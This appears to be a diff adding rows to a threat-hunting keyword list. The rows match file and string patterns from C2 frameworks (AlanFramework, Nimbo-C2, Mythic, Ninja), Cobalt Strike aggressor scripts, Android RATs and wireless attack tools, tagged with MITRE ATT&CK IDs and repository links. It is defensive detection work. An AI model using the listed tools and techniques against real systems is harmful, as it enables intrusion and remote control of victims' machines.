+"*agent/cmd_download_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
+"*agent/cmd_exec.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/cmd_kill.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/cmd_proxy.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/cmd_run.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/cmd_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z" 
+"*agent/cmd_sleep.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/cmd_sysinfo.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/cmd_upload_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent/dll.nim*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*agent/elf.nim*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - 
TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*agent/exe.nim*","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","234","35","2023-10-01T08:09:18Z","2022-10-08T19:02:58Z"
+"*Agent/ratchatPT.go*","offensive_tool_keyword","ratchatpt","C2 using openAI API","T1094 - T1071.001","TA0011 - TA0002","N/A","N/A","C2","https://github.com/spartan-conseil/ratchatpt","1","1","risk of False positive","10","10","4","2","2023-06-09T12:39:00Z","2023-06-09T09:19:10Z"
+"*agent\cmd_download_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_exec.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_kill.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_proxy.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_run.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_shell.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_sleep.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_sysinfo.c*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - 
TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent\cmd_upload_files.*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","0","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agent_code/bash_executor*","offensive_tool_keyword","mythic","mythic C2 agent","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1105 - T1106 - T1107 - T1112 - T1204","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/freyja/","1","1","N/A","10","10","11","6","2023-06-30T16:35:47Z","2022-09-28T17:20:04Z"
+"*agent_dll.dll*","offensive_tool_keyword","AlanFramework","Alan Framework is a post-exploitation framework useful during red-team activities.","T1055 - T1071 - T1060 - T1560 - T1021 - T1005 - T1018","TA0002 - TA0005 - TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/enkomio/AlanFramework","1","1","N/A","10","10","430","66","2022-08-23T18:20:33Z","2021-01-26T22:56:50Z"
+"*agents/Follina-2*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*AggressiveProxy.cna*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z"
+"*aggressor.beacons*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*aggressor.bshell*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*aggressor.cna*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z"
+"*aggressor.dialog*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*aggressor.println*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - 
T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*aggressor.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda 
- Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","290","58","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z"
+"*Aggressor/TikiTorch*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z"
+"*AggressorScripts*","offensive_tool_keyword","AggressorScripts-1","Collection of Aggressor scripts for Cobalt Strike 3.0+ pulled from multiple sources","T1074 - T1070 - T1105 - T1558","TA0007 - TA0003 - TA0002 - 
TA0043","N/A","N/A","Exploitation tools","https://github.com/Cn33liz/AggressorScripts-1","1","1","N/A","N/A","1","1","1","2018-06-24T16:27:57Z","2019-10-18T12:56:35Z"
+"*aggressor-scripts*","offensive_tool_keyword","cobaltstrike","beacon generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/eddiezab/aggressor-scripts/tree/master","1","1","N/A","10","10","1","0","2021-01-29T21:01:58Z","2021-01-29T21:00:26Z"
+"*Aggressor-Scripts*","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*ahmedkhlief/Ninja*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z"
+"*AhMyth-Android-RAT*","offensive_tool_keyword","AhMyth-Android-RAT","AhMyth Android Rat","T1020 - T1071 - T1071.001","TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/AhMyth/AhMyth-Android-RAT","1","0","N/A","N/A","10","3978","1661","2021-08-12T21:23:08Z","2017-07-07T03:03:37Z"
+"*ahsten.run \*powershell.exe*","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - 
TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","334","84","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z"
+"*aigmfoeogfnljhnofglledbhhfegannp*","greyware_tool_keyword","Lethean Proxy VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A"
+"*Airbash*","offensive_tool_keyword","Airbash","A POSIX-compliant fully automated WPA PSK handshake capture script aimed at penetration testing.","T1565 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/tehw0lf/airbash","1","0","N/A","N/A","4","340","64","2021-10-26T09:47:34Z","2018-04-18T23:50:15Z"
+"*Aircrack-ng*","offensive_tool_keyword","aircrack-ng","WiFi security auditing tools suite.","T1110 - T1170 - T1180 - T1201 - T1213","TA0001 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/aircrack-ng/aircrack-ng","1","0","N/A","N/A","10","4238","838","2023-09-30T22:40:36Z","2018-03-10T17:11:11Z"
+"*aircrack-ng*","offensive_tool_keyword","Rudrastra","Make a Fake wireless access point aka Evil Twin","T1491 - T1090.004 - T1557.001","TA0040 - TA0011 - TA0002","N/A","N/A","Sniffing & Spoofing","https://github.com/SxNade/Rudrastra","1","1","N/A","8","1","46","21","2023-04-22T15:10:42Z","2020-11-05T09:38:15Z"
+"*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation 
tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*aireplay-ng *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z"
+"*Airgeddon*","offensive_tool_keyword","Airgeddon","This is a multi-use bash script for Linux systems to audit wireless networks.","T1590 - T1533 - T1170 - T1583.001","TA0002 - TA0003 - ","N/A","N/A","Network Exploitation tools","https://github.com/v1s1t0r1sh3r3/airgeddon","1","0","N/A","N/A","10","5430","1104","2023-10-02T21:32:56Z","2016-03-18T10:34:56Z"
+"*airman604/splunk_whisperer*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","1","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z"
+"*airmon-ng*","offensive_tool_keyword","airmon-ng","This script can be used to enable monitor mode on wireless interfaces. 
It may also be used to kill network managers or go back from monitor mode to managed mode","T1018 - T1040","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://www.aircrack-ng.org/doku.php?id=airmon-ng","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
